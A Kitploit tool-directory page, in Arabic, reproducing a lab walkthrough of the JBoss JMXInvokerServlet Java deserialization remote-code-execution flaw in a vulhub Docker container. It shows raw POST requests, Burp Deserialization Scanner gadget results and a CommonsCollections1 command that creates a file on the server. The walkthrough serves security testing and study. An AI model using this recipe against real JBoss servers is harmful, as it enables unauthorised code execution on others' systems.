Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Jboss_JMXInvokerServlet_Deserialization_RCE — Jboss_JMXInvokerServlet_Deserialization_RCE | Kitploit
أدوات/GitHubGitHub/jas502n/jboss_jmxinvokerservlet_deserialization_rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubjas502n/jboss_jmxinvokerservlet_deserialization_rce

Jboss_JMXInvokerServlet_Deserialization_RCE

Jboss_JMXInvokerServlet_Deserialization_RCE

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
2110منذ 6 سنواتتمت المراجعة من قبل Kitploit

Jboss_JMXInvokerServlet_Deserialization_RCE

استغلال ثغرة Java Deserialization باستخدام Burp Suite

0x01 إعداد بيئة ثغرة Jboss JMXInvokerServlet Deserialization

بيئة الاختبار: ثغرة JBoss JMXInvokerServlet Deserialization

مبدأ الثغرة: يقوم JBoss بقراءة الكائن الذي يرسله المستخدم في طلب /invoker/JMXInvokerServlet، ثم نستغل Gadget الموجودة في Apache Commons Collections لتنفيذ أي كود.

root@kitploit:~
root@kali:~/vulhub/jboss/JMXInvokerServlet-deserialization# docker-compose up -d
jmxinvokerservlet-deserialization_jboss_1 is up-to-date

root@kali:~# docker ps -a
CONTAINER ID        IMAGE                      COMMAND                  CREATED             STATUS              PORTS                                      
65b3707b9419        vulhub/jboss:as-6.1.0      "/run.sh"                4 hours ago         Up 4 hours          0.0.0.0:8080->8080/tcp, 0.0.0.0:9990->999

0x02 الوصول إلى /invoker/JMXInvokerServlet، وإرسال حزمة POST إلى Deserialization Scanner - Manual testing

سجل BurpSuite، إذا كان مسار /invoker/JMXInvokerServlet موجودًا، تُرجع الصفحة رمز الحالة 200

root@kitploit:~
POST /invoker/JMXInvokerServlet HTTP/1.1
Host: 10.10.20.166:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Cookie: JSESSIONID=8B6B65418F89E8857F4302AB85085A36
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

aaaa

يعيد الـ response بيانات Java serialization data، الإصدار 5 تبدأ ترويسة الملف بـ aced0005737200246f72672e6a626f73

إرسال حركة المرور POST إلى /invoker/JMXInvokerServlet إلى إضافة DS انقر بزر الماوس الأيمن، ثم انقر فوق Send request to DS-Manual testing

تعيين نقطة التسلسل

حدد موقع التسلسل، نظرًا لأن JBoss يقرأ الكائن المتسلسل الذي يرسله المستخدم في طلب /invoker/JMXInvokerServlet. قم بتعيين aaaa كنقطة تسلسل، حدد كل aaaa ثم انقر فوق Set Insertion Point عند هذه النقطة تصبح بيانات POST هي $aaaa$

root@kitploit:~
POST /invoker/JMXInvokerServlet HTTP/1.1
Host: 10.10.20.166:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Cookie: JSESSIONID=8B6B65418F89E8857F4302AB85085A36
X-Forwarded-For: 127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1

§aaaa§

فحص ما إذا كانت $aaaa§ تحتوي على ثغرة تسلسل

انقر فوق Attack

ملاحظة

root@kitploit:~
SCANNING IN PROGRESS  //جارٍ الفحص
Scanning can go on approximately from 1 second up to 3 minutes, based on the number of vulnerable libraries founded
//بناءً على عدد المكتبات الضعيفة التي تم العثور عليها، يمكن أن يستغرق الفحص من ثانية واحدة تقريبًا حتى 3 دقائق

انتظر قليلًا

root@kitploit:~
Results:

Apache Commons Collections 3 (Sleep): Potentially VULNERABLE!!!
Spring Alternate Payload (Sleep): NOT vulnerable.
Apache Commons Collections 4 (Sleep): NOT vulnerable.
JSON (Sleep): NOT vulnerable.
Apache Commons Collections 3 Alternate payload 2 (Sleep): NOT vulnerable.
ROME (Sleep): NOT vulnerable.
Apache Commons Collections 4 Alternate payload (Sleep): NOT vulnerable.
Java 8 (up to Jdk8u20) (Sleep): NOT vulnerable.
Java 6 and Java 7 (up to Jdk7u21) (Sleep): Potentially VULNERABLE!!!
Hibernate 5 (Sleep): NOT vulnerable.
Commons BeanUtils (Sleep): NOT vulnerable.
Apache Commons Collections 3 Alternate payload 3 (Sleep): Potentially VULNERABLE!!!
Spring (Sleep): NOT vulnerable.
Apache Commons Collections 3 Alternate payload (Sleep): Potentially VULNERABLE!!!
END

IMPORTANT NOTE: High delayed networks may produce false positives!

طرق الاستغلال التي قد تشكل خطرًا

root@kitploit:~
Apache Commons Collections 3 (Sleep): Potentially VULNERABLE!!!   //قد يكون ضارًا!
Java 6 and Java 7 (up to Jdk7u21) (Sleep): Potentially VULNERABLE!!! //قد يكون ضارًا!
Apache Commons Collections 3 Alternate payload 3 (Sleep): Potentially VULNERABLE!!! //قد يكون ضارًا!
Apache Commons Collections 3 Alternate payload (Sleep): Potentially VULNERABLE!!!  //قد يكون ضارًا!

انقر بزر الماوس الأيمن وأرسل إلى Send to Exploitation tab

الافتراضي CommonsCollections1 COMMAND قم بتغييره إلى CommonsCollections1 "touch /tmp/jas502n"

انقر فوق Attack

ادخل إلى خادم docker وتحقق مما إذا تم إنشاء ملف /tmp/jas502n بنجاح

root@kitploit:~
root@kali:~/vulhub/jboss/JMXInvokerServlet-deserialization# docker ps -a
CONTAINER ID        IMAGE                      COMMAND                  CREATED             STATUS              PORTS                                            NAMES
65b3707b9419        vulhub/jboss:as-6.1.0      "/run.sh"                5 hours ago         Up 5 hours          0.0.0.0:8080->8080/tcp, 0.0.0.0:9990->9990/tcp   jmxinvokerservlet-deserialization_jboss_1

root@kali:~/vulhub/jboss/JMXInvokerServlet-deserialization# docker exec -it 65b3707b9419 /bin/bash
[root@65b3707b9419 /]# cd /tmp
[root@65b3707b9419 tmp]# ls
hsperfdata_root  jas502n
[root@65b3707b9419 tmp]# rm jas502n 
rm: remove regular empty file 'jas502n'? y
[root@65b3707b9419 tmp]# 
[root@65b3707b9419 tmp]# ls
hsperfdata_root
[root@65b3707b9419 tmp]# ls
hsperfdata_root  jas502n
[root@65b3707b9419 tmp]# 

الروابط المرجعية:

https://github.com/vulhub/vulhub/blob/master/jboss/JMXInvokerServlet-deserialization/README.md

https://youtu.be/F3bPD_uGXKc

تنزيل الأداة